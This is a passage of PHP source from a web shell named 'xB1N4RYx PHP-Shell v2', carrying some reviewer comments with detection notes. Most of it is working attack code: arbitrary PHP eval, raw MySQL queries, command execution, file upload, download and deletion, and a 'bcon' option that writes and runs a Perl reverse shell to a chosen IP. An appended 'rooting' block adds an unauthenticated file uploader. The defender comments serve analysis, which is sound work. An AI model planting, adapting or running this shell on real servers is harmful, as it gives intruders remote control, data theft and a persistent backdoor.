  650.         echo '<script type="text/javascript">location.href="?page=mysql";</script>';
  651.     break;
  652.    
  653.     case "go":
  654.         $goto = $_GET['goto'];
  655.         if(!isset($goto)){
  656.             echo '<form action="?page=go" method="get">';
  657.             echo '<div id="login" style="margin-left: 10px; margin-top: 10px;"><input type="hidden" name="page" value="go"/><input type="text" name="goto" id="goto" value="/"/><input type="submit" value="Go"/></div>';
  658.             echo '</form>';
  659.         }
  660.         else{
  661.             $_SESSION["current_folder"] = $goto;
  662.             echo '<script type="text/javascript">location.href="?page=list";</script>';
  663.         }
  664.     break;
  665.    
  666.     case "cf":
  667.         $ff = $_POST['fc'];
  668.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  669.         echo '<center>';
  670.         if(isset($ff)){
  671.             if(file_exists($f)){ echo 'File Already Exists!'; }
  672.             else{
  673.             echo 'Done!';
  674.             $fo = @fopen($f, "w");
  675.             fwrite($fo, "File Created By xB1N4RYx PHP-Shell v2");
  676.             fclose($fo);
  677.             }
  678.         }
  679.         echo '<br>Create File';
  680.         echo '<form action="?page=cf" method="post">';
  681.         echo '<div id="login"><input type="text" name="fc" id="fc" /></div><div id="submit"><input type="submit" value="Create"/></div>';
  682.         echo '</form>';
  683.         echo '</center>';
  684.     break;
  685.    
  686.     case "df":
  687.         $ff = $_GET['f'];
  688.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  689.         echo '<center>';
  690.         if(isset($ff)){
  691.             if(file_exists($f)){
  692.                 unlink($f);
  693.                 echo 'Done!';
  694.             }
  695.             else{
  696.                 echo 'File Doesnt Exist!';
  697.             }
  698.         }
  699.         echo '<br>Delete File';
  700.         echo '<form action="?page=df" method="post">';
  701.         echo '<div id="login"><input type="text" name="fd" id="fd" /></div><div id="submit"><input type="submit" value="Delete"/></div>';
  702.         echo '</form>';
  703.         echo '</center>';
  704.         if(!isset($_GET['noredirect']))
  705.             echo '<script type="text/javascript">location.href="?page=list";</script>';
  706.     break;
  707.    
  708.     case "cfo":
  709.         $ff = $_POST['fco'];
  710.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  711.         echo '<center>';
  712.         if(isset($ff)){
  713.             if(file_exists($f)){ echo 'Folder Already Exists!'; }
  714.             else{
  715.             echo 'Done!';
  716.             mkdir($f, 0777);
  717.             }
  718.         }
  719.         echo '<br>Create Folder';
  720.         echo '<form action="?page=cfo" method="post">';
  721.         echo '<div id="login"><input type="text" name="fco" id="fco" /></div><div id="submit"><input type="submit" value="Create"/></div>';
  722.         echo '</form>';
  723.         echo '</center>';
  724.     break;
  725.    
  726.     case "dfo":
  727.         $ff = $_GET['f'];
  728.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  729.         echo '<center>';
  730.         if(isset($ff)){
  731.             if(!file_exists($f)){ echo 'Folder Doesnt Exist!'; }
  732.             else{
  733.             echo 'Done!';
  734.             rmdir($f);
  735.             }
  736.         }
  737.         echo '<script type="text/javascript">location.href="?page=list";</script>';
  738.     break;
  739.    
  740.     case "php":
  741.         $phpc = $_POST['phpc'];
  742.         echo '<center><b>PHP Code Execution</b><br><br>Result<br><div id="phpe"><textarea rows="5" cols="60" readonly>';
  743.         eval(stripslashes($phpc));
  744.         echo '</textarea><br><br>';
  745.         echo '<form action="?page=php" method="post">';
  746.         echo 'Code<br><textarea rows="5" cols="60" name="phpc" id="phpc"></textarea></div>';
  747.         echo '<div id="submit"><input type="submit" value="Execute!" /></div></form></center>';
  748.     break;
  749.    
  750.     case "mysql":
  751.         $host = $_POST['host'];
  752.         $port = $_POST['port'];
  753.         $user = $_POST['user'];
  754.         $pass = $_POST['pass'];
  755.         if(!isset($_SESSION['muser'])){
  756.         echo '<center><form action="?page=mysql" method="post">';
  757.         echo '<div id="login">';
  758.         echo 'Host:<br><input type="text" id="host" name="host" value="127.0.0.1"/><br><br>';
  759.         echo 'Port:<br><input type="text" id="port" name="port" value="3306"/><br><br>';
  760.         echo 'User:<br><input type="text" id="user" name="user" value="root"/><br><br>';
  761.         echo 'Password:<br><input type="text" id="pass" name="pass"/><br><br>';
  762.         echo '</div>';
  763.         echo '<div id="submit"><input type="submit" value="Connect"/></div>';
  764.         echo '</form></center>';}
  765. //      else{
  766.         if(isset($user)){
  767.             $_SESSION['mhost'] = $host;
  768.             $_SESSION['mport'] = $port;
  769.             $_SESSION['muser'] = $user;
  770.             $_SESSION['mpass'] = $pass;}
  771.             if(isset($_SESSION['muser'])){
  772.                 $l = mysql_connect($_SESSION['mhost'].":".$_SESSION['mport'], $_SESSION['muser'], $_SESSION['mpass']);
  773.                 if(!$l){
  774.                     unset($_SESSION['mhost']);
  775.                     unset($_SESSION['mport']);
  776.                     unset($_SESSION['muser']);
  777.                     unset($_SESSION['mpass']);
  778.                     unset($_SESSION['mlog']);
  779.                     die("Can't Connect To MySQL");
  780.                 }
  781.                     if($_SESSION['mlog'] < 1)
  782.                         echo '<script type="text/javascript">location.href="?page=mysql";</script>';
  783.                     $_SESSION['mlog'] = 1;
  784.                 }
  785. //      }
  786.         if(isset($_SESSION['muser'])){
  787.         //if(!isset($_GET['db']) && isset($_POST['user'])){
  788.             $dbs = mysql_query("SHOW DATABASES");
  789.         echo '<table border="0" width="100%"><tr><td width="250px" valign="top" style="border-right: 1px solid #444444;">Databases:<hr style="border: 1px solid #444444;"/>';
  790.         echo '<table border="0">';
  791.         while ($row = mysql_fetch_assoc($dbs)) {
  792.             echo '<tr><td><a href="?page=mysql&a=tables&db='.$row['Database'].'">'.$row['Database'] . '</a></td><td align="right" width="100%">~&nbsp;<a align="right" href="?page=mysql&a=query&db='.$row['Database'].'">Query</a></td></tr>';
  793.         }
  794.         echo '</table>';
  795.         echo '</td><td align="center" valign="top">';
  796.         switch($_GET['a'])
  797.         {
  798.             default:
  799.                 echo '&nbsp;<hr/>';
  800.             break;
  801.            
  802.             case "tables":
  803.                 $db = $_GET['db'];
  804.                 echo 'Tables of '.$_GET['db'].'<hr/>';
  805.                 $t = mysql_query("SHOW TABLES FROM ".$_GET['db']);
  806.                 while($tb = mysql_fetch_row($t)){
  807.                     echo '<a href="?page=mysql&a=columns&table='.$tb[0].'&db='.$db.'">'.$tb[0].'</a><br>';
  808.                 }
  809.             break;
  810.            
  811.             case "columns":
  812.             echo 'Data of '.$_GET['table']." @ ".$_GET['db'].'<hr/>';
  813.             echo '<table border="0" height="100%" cellspacing="7px"><tr>';
  814.                 $db = $_GET['db'];
  815.                 $t = $_GET['table'];
  816.                 mysql_select_db($db, $l);
  817.                 $c = mysql_query("SHOW COLUMNS FROM ".$t);
  818.                 while($cc = mysql_fetch_array($c)){
  819.                     echo '<td align="center" style="border: 1px solid #444444; border-radius: 5px;">&nbsp;&nbsp;&nbsp;'.$cc[0].'&nbsp;&nbsp;&nbsp;</td>';
  820.                 }
  821.                 echo '</tr><tr>';
  822.                 $d = mysql_query("SELECT * FROM ".$t);
  823.                 while($dd = mysql_fetch_array($d)){
  824.                 echo '<tr>';
  825.                     for($i = 0; $i <= count($dd)/2-1; $i++){
  826.                         echo '<td style="border: 1px solid #444444; border-radius: 5px;" align="center">&nbsp;&nbsp;&nbsp;'.$dd[$i].'&nbsp;&nbsp;&nbsp;</td>';
  827.                         //echo '<script type="text/javascript">alert("'.count($dd).'");</script>';
  828.                     }
  829.                 echo '</tr>';
  830.                 }
  831.                 echo '</td>';
  832.             echo '</td></tr></table>';
  833.             break;
  834.            
  835.             case "query":
  836.                 $db = $_POST['pdb'];
  837.                 if(!isset($db))
  838.                     $db = $_GET['db'];
  839.                 $q = $_POST['query'];
  840.                 if(isset($db))
  841.                     echo 'Execute Query In '.$db.'<hr/>';
  842.                 if(isset($q)){
  843.                     mysql_select_db($db, $l);
  844.                     mysql_query(stripslashes($q));
  845.                     echo 'Done!';
  846.                 }
  847.                 echo '<form action="?page=mysql&a=query&db='.$db.'" method="post">';
  848.                 echo '<textarea rows="10" cols="80" name="query" id="query">'.stripslashes($q).'</textarea>';
  849.                 echo '<input type="hidden" name="pdb" id="pdb" value="'.$db.'"/>';
  850.                 echo '<div id="submit"><input type="submit" value="Execute"/></div>';
  851.                 echo '</form>';
  852.             break;
  853.         }
  854.         echo '</tr></table>';
  855.         }
  856.     break;
  857.    
  858.     case "ktask":
  859.         $f = $_GET['f'];
  860.         $win = binary_shell("taskkill /F /IM ".$f);
  861.         $gpid = binary_shell("pidof ".$f);
  862.         $linux = binary_shell("kill -9 ".$gpid);
  863.         if(isset($win))
  864.             echo "<center>".$win."</center>";
  865.         else
  866.             echo "<center>".$linux."</center>";
  867.     break;
  868.    
  869.     case "stask":
  870.         $f = $_GET['f'];
  871.         $folder = realpath($_SESSION['current_folder'])."/";
  872.         $win = binary_shell("cd ".$folder." && ".$f);
  873.         $linux = binary_shell("cd ".$folder." && "."./".$f);
  874.         if(isset($win))
  875.             echo "<center>".$win."</center>";
  876.         else
  877.             echo "<center>".$linux."</center>";
  878.     break;
  879.    
  880.     case "downloadfile":
  881.    
  882.     $f = $_GET['f'];
  883.     $file = realpath($_SESSION['current_folder'])."/".$f;
  884.  
  885.         if (file_exists($file)) {
  886.             header('Content-Description: File Transfer');
  887.             header('Content-Type: application/octet-stream');
  888.             header('Content-Disposition: attachment; filename='.$f);
  889.             header('Content-Transfer-Encoding: binary');
  890.             header('Expires: 0');
  891.             header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  892.             header('Pragma: public');
  893.             header('Content-Length: ' . filesize($file));
  894.             ob_clean();
  895.             flush();
  896.             readfile($file);
  897.             exit;
  898.             /*header('Content-disposition: attachment; filename='.$f.'');
  899.             header('Content-type: application/octet-stream');
  900.             ob_clean();
  901.             flush();
  902.             readfile($file);*/
  903.         }
  904.     break;
  905.    
  906.     case "downloadzip":
  907.         //echo '<script type="text/javascript">alert("Delete the ZIPfile after download!");</script>';
  908.         $f = $_GET['f'];
  909.         $file = realpath($_SESSION['current_folder'])."/".$f;
  910.         $fi = realpath("./".$f.'.zip');
  911.         compress($file, $f.'.zip');
  912.             header('Content-Description: File Transfer');
  913.             header('Content-Type: application/zip');
  914.             header('Content-Disposition: attachment; filename='.$f.'.zip');
  915.             header('Content-Transfer-Encoding: binary');
  916.             header('Expires: 0');
  917.             header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  918.             header('Pragma: public');
  919.             header('Content-Length: ' . filesize($fi));
  920.             ob_clean();
  921.             flush();
  922.             readfile($fi);
  923.             exit;
  924.     break;
  925.    
  926.     case "upload":
  927.         echo '<form action="?page=dupload" method="post" enctype="multipart/form-data"><br>';
  928.         echo 'Select File:<br><br>';
  929.         echo '<input type="file" id="f" name="f"/>';
  930.         echo '<br><br>Upload to:<br><div id="login"><input type="text" id="to" name="to" style="width: 300px;" value="'.realpath($_SESSION['current_folder']).'"/></div><br><div id="submit"><input type="submit" value="Upload"/></div>';
  931.         echo '</form>';
  932.     break;
  933.    
  934.     case "dupload":
  935.         $up = realpath($_POST['to'])."/".basename($_FILES['f']['name']);
  936.         if(move_uploaded_file($_FILES['f']['tmp_name'], $up))
  937.             echo "Upload Successful!";
  938.         else
  939.             echo "Upload Unsuccessful! :(";
  940.     break;
  941.    
  942.     case "sr":
  943.         echo '<center>Do you really want to <a href="?page=selfremove"><font color="#990000">remove this shell</font></a>?</center>';
  944.     break;
  945.    
  946.     case "selfremove":
  947.         unlink($_SERVER['SCRIPT_FILENAME']);
  948.         echo '<script>alert(\'Removed '.$_SERVER["SCRIPT_FILENAME"].'!\');';
  949.         echo 'location.href="?page=is_it_really_gone?";';
  950.         echo '</script>';
  951.     break;
  952.    
  953.     case "viewimage":
  954.         $i = $_GET['i'];
  955.         $v = realpath($_SESSION['current_folder']).$cslash.$i;
  956.         /*echo $v;
  957.         echo '<center>';
  958.         echo '<img src="C:\www/menace.png" border="0"/>';
  959.         echo '</center>';*/
  960.         header("Content-type: image/png");
  961.         ob_clean();
  962.         flush();
  963.         readfile($v);
  964.     break;
  965.    
  966.     case "viewmovie":
  967.         $i = $_GET['i'];
  968.         $v = realpath($_SESSION['current_folder']).$cslash.$i;
  969.         header("Content-type: video/quicktime");
  970.         ob_clean();
  971.         flush();
  972.         readfile($v);
  973.     break;
  974.    
  975.     case "bcon":
  976.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  977.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  978.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  979.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  980.         echo '</form>';
  981.         echo '</div>';
  982.         if(isset($_GET['ip']) && isset($_GET['port'])){
  983.             $ip = $_GET['ip'];
  984.             $port = $_GET['port'];
  985.             $bc = fopen("/tmp/bxcon.pl","w");
  986.             fwrite($bc,'#!/usr/bin/perl
  987. use Socket;
  988. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  989. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  990. $proto=getprotobyname("tcp");
  991. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  992. connect(SOCKET, $paddr) || die("Error: $!\n");
  993. open(STDIN, ">&SOCKET");
  994. open(STDOUT, ">&SOCKET");
  995. open(STDERR, ">&SOCKET");
  996. system("/bin/sh -i");
  997. close(STDIN);
  998. close(STDOUT);
  999. close(STDERR);');
  1000.             fclose($bc);
  1001.             shell_exec("perl /tmp/bxcon.pl");
  1002.             unlink("/tmp/bxcon.pl");
  1003.         }
  1004.     break;
  1005.  
  1006. }
  1007.  
        // Page footer: emits closing table/body/html tags (the matching opening
        // markup is presumably printed earlier in the file, outside this view)
        // together with a fixed author/date string.
        // NOTE(review): a constant literal like this footer is a cheap static
        // signature for file-system scans, but it is trivially edited, so it
        // should be paired with behavioural indicators (eval() on request data,
        // shell_exec(), uploads written next to the script) rather than relied
        // on alone.
  1008. echo '</td>
  1009. </tr>
  1010. </table>
  1011. <br><center>xB1N4RYx ~ 2012</center><br>
  1012. </body>
  1013. </html>';
  1014. ?>
  1015. <?php
        // Second PHP block appended after the main script's closing tag.
        // NOTE(review): nothing in this block checks a session or credential.
        // Whether the login logic earlier in the file stops execution before
        // this point cannot be determined from here -- treat it as a separate,
        // possibly unauthenticated entry point until confirmed.
        /**
         * Prints host identification and a file-upload form, and stores a
         * posted file on disk.
         *
         * - Outputs php_uname() (OS / host / kernel string) under the label
         *   "Sw Bilgi" (Turkish; presumably "server info").
         * - Renders a multipart form that posts back to the current URL.
         * - When POST field `_upl` equals "Upload", copies the uploaded temp
         *   file to the name supplied by the client, as a relative path.
         *
         * Defender notes:
         * - The destination name comes from the request and there is no
         *   extension, MIME or content check, so executable script files are
         *   accepted as-is.
         * - copy() is used instead of move_uploaded_file(), and is_uploaded_file()
         *   is never called.
         * - The `@` operator suppresses warnings, so failures leave no PHP
         *   error-log entry; only the HTML status text differs.
         * - Request-side indicators visible in this code: query parameter
         *   `x=rooting` and a multipart POST carrying `_upl=Upload` with a
         *   file part named `file`.
         */
  1016. function rooting()
  1017. {
        // Discloses platform details to whoever loads the page.
  1018. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
        // Empty action="" makes the form post back to the same URL.
  1019. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1020. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
        // Loose comparison on an index that may be unset; notices are hidden
        // only if error reporting is disabled elsewhere.
  1021. if( $_POST['_upl'] == "Upload" ) {
        // Relative destination: resolved against the current working directory
        // (assumed to be the script's directory under a web SAPI -- confirm).
        // 'Yuklendi' / 'Basarisiz' are Turkish for "uploaded" / "failed".
  1022.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1023.     else { echo '<b>Basarisiz</b><br><br>'; }
  1024. }
  1025. }
        // Dispatcher: the `x` query parameter selects the action. Any value
        // other than "rooting" (including a missing parameter) does nothing.
  1026. $x = $_GET["x"];
        // PHP keywords are case-insensitive, and a ';' is accepted in place of
        // ':' after a case label, so this parses as an ordinary switch.
  1027. Switch($x){
  1028. case "rooting";
  1029.     rooting();
  1030.     break;
  1031.    
  1032.     }
  1033. ?>